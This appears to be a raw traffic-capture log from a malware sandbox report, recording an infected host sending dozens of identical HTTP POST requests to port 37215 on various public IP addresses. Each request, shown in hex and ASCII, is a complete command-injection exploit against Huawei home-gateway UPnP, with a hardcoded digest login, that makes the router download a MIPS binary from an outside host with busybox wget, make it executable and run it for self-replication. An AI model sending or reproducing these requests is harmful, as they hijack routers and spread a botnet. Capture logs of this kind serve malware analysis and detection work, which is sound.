2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2045192.168.2.155406241.246.102.18437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:20.065773010 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2046192.168.2.1544418131.247.37.16037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.059719086 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2047192.168.2.1548546157.217.99.2137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.059751034 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2048192.168.2.15328902.174.232.2337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.059766054 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2049192.168.2.1543512169.102.104.13037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.059793949 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2050192.168.2.1560424157.54.238.9837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.059818029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2051192.168.2.154440641.29.90.8537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.059844017 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2052192.168.2.1552728157.245.193.12237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.059869051 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2053192.168.2.1536508157.72.88.4637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.065845966 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2054192.168.2.155326841.193.7.7437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.065867901 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2055192.168.2.1533302197.38.178.14437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.065895081 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
